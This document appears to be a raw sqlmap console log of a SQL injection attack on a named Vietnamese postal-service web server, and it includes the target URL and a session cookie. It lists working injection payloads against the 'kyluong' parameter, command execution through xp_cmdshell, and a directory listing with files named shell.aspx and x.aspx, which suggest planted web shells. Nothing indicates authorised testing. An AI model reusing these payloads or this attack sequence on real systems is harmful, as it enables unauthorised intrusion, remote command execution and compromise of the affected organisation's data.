        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.11.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:59:15 /2025-11-17/

[1/1] URL:
GET http://vps.vnpost.vn/chamcong/report/rpt_BCC.aspx?kyluong=112025&MA_DV=KVMB&TEN_DV=Kho%20v%E1%BA%ADn%20mi%E1%BB%81n%20b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC%20Khai%20th%C3%A1c%20TC&MA_TO=VP&TEN_TO=V%C4%83n%20ph%C3%B2ng
Cookie: ASP.NET_SessionId=lswqd4itz5u4ftzm3jcmjfio
do you want to test this URL? [Y/n/q]
> Y
[18:59:17] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kyluong (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: kyluong=112025' AND 2784=(SELECT (CASE WHEN (2784=2784) THEN 2784 ELSE (SELECT 7134 UNION SELECT 5563) END))-- gZAK&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: kyluong=112025' AND 4111 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4111=4111) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113))) AND 'mddd'='mddd&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: kyluong=112025';WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: kyluong=112025' WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: kyluong=112025' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(73)+CHAR(120)+CHAR(99)+CHAR(75)+CHAR(114)+CHAR(82)+CHAR(104)+CHAR(102)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(106)+CHAR(81)+CHAR(102)+CHAR(74)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(69)+CHAR(67)+CHAR(81)+CHAR(82)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(104)+CHAR(78)+CHAR(81)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(111)+CHAR(104)+CHAR(68)+CHAR(110)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113)-- kFjk&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng
---
do you want to exploit this SQL injection? [Y/n] Y
web server operating system: Windows 2019 or 11 or 2016 or 2022 or 10
web application technology: ASP.NET 4.0.30319, Microsoft IIS 10.0, ASP.NET
back-end DBMS: Microsoft SQL Server 2017
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:
---
Volume in drive C is OS
 Volume Serial Number is A68A-BDF8
 
 Directory of C:\inetpub\wwwroot
 
11/18/2025  12:01 AM    <DIR>          .
11/18/2025  12:01 AM    <DIR>          .
11/18/2025  12:01 AM    <DIR>          ..
11/18/2025  12:01 AM    <DIR>          ..
04/24/2019  03:13 PM    <DIR>          App_Data
04/24/2019  03:13 PM    <DIR>          App_Data
04/24/2019  10:56 AM    <DIR>          aspnet_client
04/24/2019  10:56 AM    <DIR>          aspnet_client
03/27/2025  08:27 AM               703 iisstart.htm
03/27/2025  08:27 AM               703 iisstart.htm
03/27/2025  08:27 AM            99,710 iisstart.png
03/27/2025  08:27 AM            99,710 iisstart.png
11/18/2025  12:01 AM             2,750 shell.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             2,750 shell.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             1,886 shell.aspx_BC02_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             1,886 shell.aspx_BC02_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM           219,765 shell.aspx_BC03_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM           219,765 shell.aspx_BC03_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             2,750 x.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             2,750 x.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
               6 File(s)        327,564 bytes
               6 File(s)        327,564 bytes
               4 Dir(s)  31,792,484,352 bytes free
               4 Dir(s)  31,792,484,352 bytes free
 
 Volume in drive C is OS
 Volume Serial Number is A68A-BDF8
 
 Directory of C:\inetpub\wwwroot
 
11/18/2025  12:01 AM    <DIR>          .
11/18/2025  12:01 AM    <DIR>          .
11/18/2025  12:01 AM    <DIR>          ..
11/18/2025  12:01 AM    <DIR>          ..
04/24/2019  03:13 PM    <DIR>          App_Data
04/24/2019  03:13 PM    <DIR>          App_Data
04/24/2019  10:56 AM    <DIR>          aspnet_client
04/24/2019  10:56 AM    <DIR>          aspnet_client
03/27/2025  08:27 AM               703 iisstart.htm
03/27/2025  08:27 AM               703 iisstart.htm
03/27/2025  08:27 AM            99,710 iisstart.png
03/27/2025  08:27 AM            99,710 iisstart.png
11/18/2025  12:01 AM             2,750 shell.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
11/18/2025  12:01 AM             2,750 shell.aspx_BC01_KVMB_KVMBTCVP  _BC_DT.xls
---
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] Y

[*] ending @ 18:59:33 /2025-11-17/

